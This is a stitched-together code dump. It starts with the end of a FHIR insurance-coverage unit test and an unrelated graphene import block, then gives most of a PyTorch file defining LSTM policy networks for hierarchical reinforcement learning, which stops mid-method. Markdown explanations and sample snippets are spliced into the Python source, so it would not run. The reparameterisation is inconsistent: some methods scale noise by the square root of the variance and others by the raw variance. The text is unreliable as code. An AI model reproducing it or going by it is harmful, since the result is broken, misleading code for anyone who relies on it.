self.assertEqual(inst.class_fhir[7].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[7].value, "MDF12345")
self.assertEqual(inst.class_fhir[8].type.coding[0].code, "rxbin")
self.assertEqual(inst.class_fhir[8].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[8].value, "987654")
self.assertEqual(inst.class_fhir[9].type.coding[0].code, "rxgroup")
self.assertEqual(inst.class_fhir[9].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[9].value, "M35PT")
self.assertEqual(inst.dependent, "0")
self.assertEqual(inst.id, "9876B1")
self.assertEqual(inst.identifier[0].system, "http://benefitsinc.com/certificate")
self.assertEqual(inst.identifier[0].value, "12345")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.period.end.date, FHIRDate("2012-05-23").date)
self.assertEqual(inst.period.end.as_json(), "2012-05-23")
self.assertEqual(inst.period.start.date, FHIRDate("2011-05-23").date)
self.assertEqual(inst.period.start.as_json(), "2011-05-23")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
from .mechanical_graphene import MechanicalGraphene
from .mechanical_graphene import MechanicalGrapheneLattice
from .mechanical_graphene import HamiltonianType
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from headers import *
# Check if CUDA is available, set device to GPU if it is, otherwise use CPU.
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
# torch.cuda.set_device(torch.device('cuda:1'))
# if use_cuda:
# torch.cuda.set_device(2)
class PolicyNetwork_BaseClass(torch.nn.Module):
def __init__(self):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(PolicyNetwork_BaseClass, self).__init__()
def sample_action(self, action_probabilities):
# Categorical distribution sampling.
sample_action = torch.distributions.Categorical(probs=action_probabilities).sample().squeeze(0)
return sample_action
def select_greedy_action(self, action_probabilities):
# Select action with max probability for test time.
return action_probabilities.argmax()
# def select_epsilon_greedy_action(self, action_probabilities):
# epsilon = 0.1
# if np.random.random()<epsilon:
# return self.sample_action(action_probabilities)
# else:
# return self.select_greedy_action(action_probabilities)
def select_epsilon_greedy_action(self, action_probabilities, epsilon=0.1):
whether_greedy = torch.rand(action_probabilities.shape[0]).to(device)
sample_actions = torch.where(whether_greedy<epsilon, self.sample_action(action_probabilities), self.select_greedy_action(action_probabilities))
return sample_actions
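The epsilon-greedy rule above, restated standalone with the standard library (the `epsilon_greedy` name and list-based `probs` are illustrative; the class method works on torch tensors instead):

```python
import random

def epsilon_greedy(probs, epsilon=0.1, rng=random):
    """With probability epsilon sample an index from `probs`, else take the argmax."""
    if rng.random() < epsilon:
        # Explore: sample an action index according to the distribution.
        return rng.choices(range(len(probs)), weights=probs, k=1)[0]
    # Exploit: most probable action.
    return max(range(len(probs)), key=lambda i: probs[i])
```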
class PolicyNetwork(PolicyNetwork_BaseClass):
# REMEMBER, in the Bi-directional model, this is going to be evaluated for log-probabilities alone.
# Forward pass set up for evaluating this already.
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, output_size, number_subpolicies, number_layers=4, batch_size=1, whether_latentb_input=False):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(PolicyNetwork, self).__init__()
if whether_latentb_input:
self.input_size = input_size+number_subpolicies+1
else:
self.input_size = input_size+number_subpolicies
self.hidden_size = hidden_size
self.output_size = output_size
self.num_layers = number_layers
self.batch_size = batch_size
# Create LSTM Network.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers)
# Define output layers for the LSTM, and activations for this output layer.
self.output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.softmax_layer = torch.nn.Softmax(dim=1)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
def forward(self, input, hidden=None, return_log_probabilities=False):
# The argument hidden_input here is the initial hidden state we want to feed to the LSTM.
# Assume inputs is the trajectory sequence.
# Input Format must be: Sequence_Length x Batch_Size x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
outputs, hidden = self.lstm(format_input)
# Takes softmax of last output.
if return_log_probabilities:
# Computes log probabilities, needed for loss function and log likelihood.
preprobability_outputs = self.output_layer(outputs)
log_probabilities = self.batch_logsoftmax_layer(preprobability_outputs).squeeze(1)
probabilities = self.batch_softmax_layer(preprobability_outputs).squeeze(1)
return outputs, hidden, log_probabilities, probabilities
else:
# Compute action probabilities for sampling.
softmax_output = self.softmax_layer(self.output_layer(outputs[-1]))
return outputs, hidden, softmax_output
class ContinuousPolicyNetwork(PolicyNetwork_BaseClass):
# REMEMBER, in the Bi-directional model, this is going to be evaluated for log-probabilities alone.
# Forward pass set up for evaluating this already.
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
# def __init__(self, input_size, hidden_size, output_size, number_subpolicies, number_layers=4, batch_size=1):
# def __init__(self, input_size, hidden_size, output_size, z_space_size, number_layers=4, batch_size=1, whether_latentb_input=False):
def __init__(self, input_size, hidden_size, output_size, args, number_layers=4, whether_latentb_input=False, zero_z_dim=False, small_init=False):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(ContinuousPolicyNetwork, self).__init__()
self.hidden_size = hidden_size
# The output size here must be mean+variance for each dimension.
# This is output_size*2.
self.args = args
if self.args is None:
self.debug = False
self.latent_z_dimensions = 16
self.dropout = 0.
else:
self.latent_z_dimensions = self.args.z_dimensions
self.dropout = self.args.dropout
self.debug = self.args.debug
self.output_size = output_size
self.num_layers = number_layers
self.batch_size = 1 if self.args is None else self.args.batch_size
if whether_latentb_input:
# self.input_size = input_size+self.args.z_dimensions+1
self.input_size = input_size+self.latent_z_dimensions+1
else:
if zero_z_dim:
self.input_size = input_size
else:
# self.input_size = input_size+self.args.z_dimensions
self.input_size = input_size+self.latent_z_dimensions
# Create LSTM Network.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, dropout=self.dropout)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
# # Try initializing the network to something, so that we can escape the stupid constant output business.
if small_init:
for name, param in self.mean_output_layer.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.0)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=0.0001)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
def forward(self, input, action_sequence, epsilon=0.001, batch_size=None, debugging=False):
# Input is the trajectory sequence of shape: Sequence_Length x 1 x Input_Size.
# Here, we also need the continuous actions as input to evaluate their logprobability / probability.
# format_input = torch.tensor(input).view(input.shape[0], self.batch_size, self.input_size).float().to(device)
if batch_size is None:
batch_size = self.batch_size
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
if isinstance(action_sequence,np.ndarray):
format_action_seq = torch.from_numpy(action_sequence).to(device).float().view(action_sequence.shape[0], batch_size, self.output_size)
else:
format_action_seq = action_sequence.view(action_sequence.shape[0], batch_size, self.output_size)
# format_action_seq = torch.from_numpy(action_sequence).to(device).float().view(action_sequence.shape[0],1,self.output_size)
lstm_outputs, hidden = self.lstm(format_input)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
# variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias) + epsilon
# Remember, because of Pytorch's dynamic construction, this distribution can have it's own batch size.
# It doesn't matter if batch sizes changes over different forward passes of the LSTM, because we're only going
# to evaluate this distribution (instance)'s log probability with the same sequence length.
# if debugging:
# embed()
covariance_matrix = torch.diag_embed(variance_outputs)
# Executing distribution creation on CPU and then copying back to GPU.
dist = torch.distributions.MultivariateNormal(mean_outputs.cpu(), covariance_matrix.cpu())
log_probabilities = dist.log_prob(format_action_seq.cpu()).to(device)
# dist = torch.distributions.MultivariateNormal(mean_outputs, covariance_matrix)
# log_probabilities = dist.log_prob(format_action_seq)
# log_probabilities = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs)).log_prob(format_action_seq)
entropy = dist.entropy()
if self.debug: # Use the flag cached in __init__ so this also works when self.args is None.
print("Embedding in the policy network.")
embed()
return log_probabilities, entropy
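For reference, the log-probability that `MultivariateNormal` with a `diag_embed`-ed covariance assigns to one action vector has a simple closed form; a standard-library sketch (illustrative name, one timestep):

```python
import math

def diag_gaussian_log_prob(action, mean, variance):
    """log N(action | mean, diag(variance)): per-dimension squared error
    scaled by the variance, plus the Gaussian normalising constant."""
    return -0.5 * sum(
        (a - m) ** 2 / v + math.log(2.0 * math.pi * v)
        for a, m, v in zip(action, mean, variance)
    )
```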
# @gpu_profile
def get_actions(self, input, greedy=False, batch_size=None):
if batch_size is None:
batch_size = self.batch_size
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
lstm_outputs, hidden = self.lstm(format_input)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
if greedy:
return mean_outputs
else:
# Remember, because of Pytorch's dynamic construction, this distribution can have it's own batch size.
# It doesn't matter if batch sizes changes over different forward passes of the LSTM, because we're only going
# to evaluate this distribution (instance)'s log probability with the same sequence length.
dist = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
return dist.sample()
def reparameterized_get_actions(self, input, greedy=False, action_epsilon=0.):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
lstm_outputs, hidden = self.lstm(format_input)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
noise = torch.randn_like(variance_outputs)
if greedy:
action = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct it as mu + sigma * eps (random noise).
# Take the square root because variance_outputs parameterises the variance, not the standard deviation.
action = mean_outputs + torch.sqrt(variance_outputs) * noise
return action
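The reparameterisation trick used here, in isolation: draw eps ~ N(0, 1) once, then build the sample as mu + sigma·eps so the sample is a differentiable function of mu and sigma. A stdlib sketch (illustrative names; assumes `variance` holds variances, so sigma = sqrt(variance)):

```python
import math
import random

def reparam_sample(mean, variance, eps=None, rng=random):
    """Sample mu + sqrt(v) * eps with eps ~ N(0, 1), element-wise."""
    if eps is None:
        eps = [rng.gauss(0.0, 1.0) for _ in mean]
    return [m + math.sqrt(v) * e for m, v, e in zip(mean, variance, eps)]
```

With eps fixed at zero the sample collapses to the mean, which is the greedy branch above.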
def incremental_reparam_get_actions(self, input, greedy=False, action_epsilon=0., hidden=None):
# Input should be a single timestep input here.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of feeding in entire input sequence, we are feeding in current timestep input and previous hidden state.
lstm_outputs, hidden = self.lstm(format_input, hidden)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(lstm_outputs))
else:
mean_outputs = self.mean_output_layer(lstm_outputs)
variance_outputs = (self.variance_activation_layer(self.variances_output_layer(lstm_outputs))+self.variance_activation_bias)
noise = torch.randn_like(variance_outputs)
if greedy:
action = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct it as mu + sigma * eps (random noise).
# Take the square root because variance_outputs parameterises the variance, not the standard deviation.
action = mean_outputs + torch.sqrt(variance_outputs) * noise
return action, hidden
def get_regularization_kl(self, input_z1, input_z2):
# Input is the trajectory sequence of shape: Sequence_Length x 1 x Input_Size.
# Here, we also need the continuous actions as input to evaluate their logprobability / probability.
format_input_z1 = input_z1.view(input_z1.shape[0], self.batch_size, self.input_size)
format_input_z2 = input_z2.view(input_z2.shape[0], self.batch_size, self.input_size)
hidden = None
# format_action_seq = torch.from_numpy(action_sequence).to(device).float().view(action_sequence.shape[0],1,self.output_size)
lstm_outputs_z1, _ = self.lstm(format_input_z1)
# Reset hidden?
lstm_outputs_z2, _ = self.lstm(format_input_z2)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs_z1 = self.activation_layer(self.mean_output_layer(lstm_outputs_z1))
mean_outputs_z2 = self.activation_layer(self.mean_output_layer(lstm_outputs_z2))
else:
mean_outputs_z1 = self.mean_output_layer(lstm_outputs_z1)
mean_outputs_z2 = self.mean_output_layer(lstm_outputs_z2)
variance_outputs_z1 = self.variance_activation_layer(self.variances_output_layer(lstm_outputs_z1))+self.variance_activation_bias
variance_outputs_z2 = self.variance_activation_layer(self.variances_output_layer(lstm_outputs_z2))+self.variance_activation_bias
dist_z1 = torch.distributions.MultivariateNormal(mean_outputs_z1, torch.diag_embed(variance_outputs_z1))
dist_z2 = torch.distributions.MultivariateNormal(mean_outputs_z2, torch.diag_embed(variance_outputs_z2))
kl_divergence = torch.distributions.kl_divergence(dist_z1, dist_z2)
return kl_divergence
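The KL divergence `torch.distributions.kl_divergence` computes between two diagonal Gaussians has a closed form; a standard-library reference version (illustrative name, summed over dimensions):

```python
import math

def diag_gaussian_kl(mean1, var1, mean2, var2):
    """KL( N(mean1, diag(var1)) || N(mean2, diag(var2)) ), summed per-dimension."""
    return sum(
        0.5 * (math.log(v2 / v1) + (v1 + (m1 - m2) ** 2) / v2 - 1.0)
        for m1, v1, m2, v2 in zip(mean1, var1, mean2, var2)
    )
```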
class LatentPolicyNetwork(PolicyNetwork_BaseClass):
# REMEMBER, in the Bi-directional Information model, this is going to be evaluated for log-probabilities alone.
# THIS IS STILL A SINGLE DIRECTION LSTM!!
# This still needs to be written separately from the normal sub-policy network(s) because it also requires termination probabilities.
# Must change forward pass back to using lstm() directly on the entire sequence rather than iterating.
# Now we have the whole input sequence beforehand.
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, number_subpolicies, number_layers=4, b_exploration_bias=0., batch_size=1):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(LatentPolicyNetwork, self).__init__()
# Input size is actually input_size + number_subpolicies +1
self.input_size = input_size+number_subpolicies+1
self.offset_for_z = input_size+1
self.hidden_size = hidden_size
self.number_subpolicies = number_subpolicies
self.output_size = number_subpolicies
self.num_layers = number_layers
self.b_exploration_bias = b_exploration_bias
self.batch_size = batch_size
# Define LSTM.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers).to(device)
# # Try initializing the network to something, so that we can escape the stupid constant output business.
for name, param in self.lstm.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.0)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=5)
# Transform to output space - Latent z and Latent b.
self.subpolicy_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.termination_output_layer = torch.nn.Linear(self.hidden_size,2)
# Sigmoid and Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
def forward(self, input):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_z_preprobabilities = self.subpolicy_output_layer(outputs)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
latent_z_probabilities = self.batch_softmax_layer(latent_z_preprobabilities).squeeze(1)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
latent_z_logprobabilities = self.batch_logsoftmax_layer(latent_z_preprobabilities).squeeze(1)
latent_b_logprobabilities = self.batch_logsoftmax_layer(latent_b_preprobabilities).squeeze(1)
# Return log probabilities.
return latent_z_logprobabilities, latent_b_logprobabilities, latent_b_probabilities, latent_z_probabilities
def get_actions(self, input, greedy=False):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_z_preprobabilities = self.subpolicy_output_layer(outputs)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
latent_z_probabilities = self.batch_softmax_layer(latent_z_preprobabilities).squeeze(1)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
if greedy:
selected_b = self.select_greedy_action(latent_b_probabilities)
selected_z = self.select_greedy_action(latent_z_probabilities)
else:
selected_b = self.sample_action(latent_b_probabilities)
selected_z = self.sample_action(latent_z_probabilities)
return selected_b, selected_z
def select_greedy_action(self, action_probabilities):
# Select the action with maximum probability (argmax over the last, action dimension) for test time.
return action_probabilities.argmax(dim=-1)
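# The discrete head above can be sketched in isolation: a linear layer maps LSTM
# features to K logits, Softmax/LogSoftmax over the action dimension give per-timestep
# (log-)probabilities, and argmax(dim=-1) is the greedy selection. The layer and
# shapes below are illustrative stand-ins, not the class's actual modules.

```python
import torch

T, B, H, K = 6, 1, 8, 4                 # sequence length, batch, hidden size, number of subpolicies
features = torch.randn(T, B, H)         # stand-in for the LSTM outputs
head = torch.nn.Linear(H, K)            # stand-in for subpolicy_output_layer

logits = head(features)                               # (T, B, K)
probs = torch.nn.Softmax(dim=2)(logits).squeeze(1)    # (T, K); each row sums to 1
logprobs = torch.nn.LogSoftmax(dim=2)(logits).squeeze(1)
greedy_z = probs.argmax(dim=-1)                       # (T,) greedy subpolicy indices
```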
class ContinuousLatentPolicyNetwork(PolicyNetwork_BaseClass):
# def __init__(self, input_size, hidden_size, z_dimensions, number_layers=4, b_exploration_bias=0., batch_size=1):
def __init__(self, input_size, hidden_size, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousLatentPolicyNetwork, self).__init__()
self.args = args
# Input size is actually input_size + number_subpolicies +1
self.input_size = input_size+self.args.z_dimensions+1
self.offset_for_z = input_size+1
self.hidden_size = hidden_size
# self.number_subpolicies = number_subpolicies
self.output_size = self.args.z_dimensions
self.num_layers = number_layers
self.b_exploration_bias = self.args.b_exploration_bias
self.batch_size = self.args.batch_size
# Define LSTM.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, dropout=self.args.dropout).to(device)
# Transform to output space - Latent z and Latent b.
# self.subpolicy_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.termination_output_layer = torch.nn.Linear(self.hidden_size,2)
# Softmax activations for the Bernoulli termination probability and latent z selection.
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
# Initialize the LSTM parameters explicitly so the network doesn't get stuck producing near-constant outputs early in training.
for name, param in self.lstm.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.001)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=5)
# Also initialize the mean_output_layer weights with a larger gain.
for name, param in self.mean_output_layer.named_parameters():
if 'bias' in name:
torch.nn.init.constant_(param, 0.)
elif 'weight' in name:
torch.nn.init.xavier_normal_(param,gain=2)
def forward(self, input, epsilon=0.001):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_b_preprobabilities = self.termination_output_layer(outputs)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
latent_b_logprobabilities = self.batch_logsoftmax_layer(latent_b_preprobabilities).squeeze(1)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
if self.args.debug:
print("Embedding in Latent Policy.")
embed()
# Return log probabilities.
return latent_b_logprobabilities, latent_b_probabilities, self.dists
def get_actions(self, input, greedy=False, epsilon=0.001):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Scale the variance output by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
if greedy:
selected_b = self.select_greedy_action(latent_b_probabilities)
selected_z = mean_outputs
else:
# selected_b = self.sample_action(latent_b_probabilities)
selected_b = self.select_greedy_action(latent_b_probabilities)
selected_z = self.dists.sample()
return selected_b, selected_z
def incremental_reparam_get_actions(self, input, greedy=False, action_epsilon=0.001, hidden=None, previous_z=None):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
outputs, hidden = self.lstm(format_input, hidden)
latent_b_preprobabilities = self.termination_output_layer(outputs)
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Greedily select b.
selected_b = self.select_greedy_action(latent_b_probabilities)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Scale the variance output by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + action_epsilon
noise = torch.randn_like(variance_outputs)
if greedy:
selected_z = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
selected_z = mean_outputs + variance_outputs * noise
# If single input and previous_z is None, this is the first timestep: set b to 1 and leave z as-is.
if input.shape[0]==1 and previous_z is None:
selected_b[0] = 1
# If previous_z is not None, this is not the first timestep; if b is 0, reuse the previous z.
elif input.shape[0]==1 and previous_z is not None:
if selected_b==0:
selected_z = previous_z
elif input.shape[0]>1:
# Now modify z's as per New Z Selection.
# Set initial b to 1.
selected_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if selected_b[t]==0:
selected_z[t] = selected_z[t-1]
return selected_z, selected_b, hidden
def reparam_get_actions(self, input, greedy=False, action_epsilon=0.001, hidden=None):
# Thin wrapper around the incremental version, which already handles new z selection
# (a new z takes effect only at timesteps where b is 1; otherwise the previous z is reused).
selected_z, selected_b, hidden = self.incremental_reparam_get_actions(input, greedy=greedy, action_epsilon=action_epsilon, hidden=hidden)
return selected_z, selected_b, hidden
def select_greedy_action(self, action_probabilities):
# Select the action with maximum probability (argmax over the last, action dimension) for test time.
return action_probabilities.argmax(dim=-1)
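# The reparameterization used in incremental_reparam_get_actions above can be
# sketched on its own: instead of sampling z ~ N(mu, scale^2), construct
# z = mu + scale * eps with eps ~ N(0, I), so gradients flow back through mu and
# scale. (As in the code above, the variance output is used directly as the scale;
# the tensors here are toy stand-ins.)

```python
import torch

mu = torch.zeros(3, requires_grad=True)     # stand-in for the predicted means
scale = torch.ones(3, requires_grad=True)   # stand-in for the predicted variances/scales
eps = torch.randn(3)                        # random noise; no gradient needed

z = mu + scale * eps        # differentiable w.r.t. mu and scale
loss = (z ** 2).sum()       # any downstream loss
loss.backward()
```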
class ContinuousLatentPolicyNetwork_ConstrainedBPrior(ContinuousLatentPolicyNetwork):
def __init__(self, input_size, hidden_size, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousLatentPolicyNetwork_ConstrainedBPrior, self).__init__(input_size, hidden_size, args, number_layers)
# We can inherit the forward function from the above class... we just need to modify get actions.
self.min_skill_time = 12
self.max_skill_time = 16
def get_prior_value(self, elapsed_t, max_limit=5):
skill_time_limit = max_limit-1
if self.args.data in ['MIME','Roboturk','OrigRoboturk','FullRoboturk','Mocap']:
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# Choose a length of 12-16; prob_biases nudges the termination logits over that window.
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 16
skill_time_limit = 12
else:
max_limit = 20
skill_time_limit = max_limit-1
prior_value = torch.zeros((1,2)).to(device).float()
# If at or over hard limit.
if elapsed_t>=max_limit:
prior_value[0,1]=1.
# If at or more than typical, less than hard limit:
elif elapsed_t>=skill_time_limit:
if self.args.var_skill_length:
prior_value[0] = torch.tensor(prob_biases[elapsed_t-skill_time_limit]).to(device).float()
else:
# Leave the termination logit unbiased (no extra termination pressure yet).
prior_value[0,1]=0.
# If less than typical.
else:
# Continue.
prior_value[0,0]=1.
return prior_value
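# The piecewise b-prior above can be summarized with a small pure-Python helper
# (hypothetical, not part of the class): below the typical skill length, bias toward
# continuing (b=0); at or past the hard limit, force termination (b=1); in between,
# look up the prob_biases table. Defaults mirror the var_skill_length branch above.

```python
def prior_bias(elapsed_t, skill_time_limit=12, max_limit=16,
               prob_biases=((0.8, 0.), (0.4, 0.), (0., 0.), (0., 0.4))):
    # Returns (continue_bias, terminate_bias) to add to the termination logits.
    if elapsed_t >= max_limit:            # at/over the hard limit: force b=1
        return (0., 1.)
    if elapsed_t >= skill_time_limit:     # typical range: table lookup
        return prob_biases[elapsed_t - skill_time_limit]
    return (1., 0.)                       # below typical length: continue with b=0
```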
def get_actions(self, input, greedy=False, epsilon=0.001, delta_t=0, batch_size=None):
if batch_size is None:
batch_size = self.batch_size
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Scale the variance output by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
############################################
prior_value = self.get_prior_value(delta_t)
# Add the prior value only to the last timestep; the last sampled b is what gets copied out and stored.
latent_b_preprobabilities[-1, :, :] += prior_value
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Sample b.
selected_b = self.select_greedy_action(latent_b_probabilities)
############################################
# Now implementing hard constrained b selection.
if delta_t < self.min_skill_time:
# Continue. Set b to 0.
selected_b[-1] = 0.
elif (self.min_skill_time <= delta_t) and (delta_t < self.max_skill_time):
pass
else:
# Stop and select a new z. Set b to 1.
selected_b[-1] = 1.
# Also get z; assume the higher-level function handles the new z selection component.
if greedy:
selected_z = mean_outputs
else:
selected_z = self.dists.sample()
return selected_b, selected_z
def incremental_reparam_get_actions(self, input, greedy=False, action_epsilon=0.001, hidden=None, previous_z=None, delta_t=0):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
outputs, hidden = self.lstm(format_input, hidden)
latent_b_preprobabilities = self.termination_output_layer(outputs)
############################################
# GET PRIOR AND ADD.
prior_value = self.get_prior_value(delta_t)
latent_b_preprobabilities[-1, :, :] += prior_value
############################################
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Greedily select b.
selected_b = self.select_greedy_action(latent_b_probabilities)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Scale the variance output by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + action_epsilon
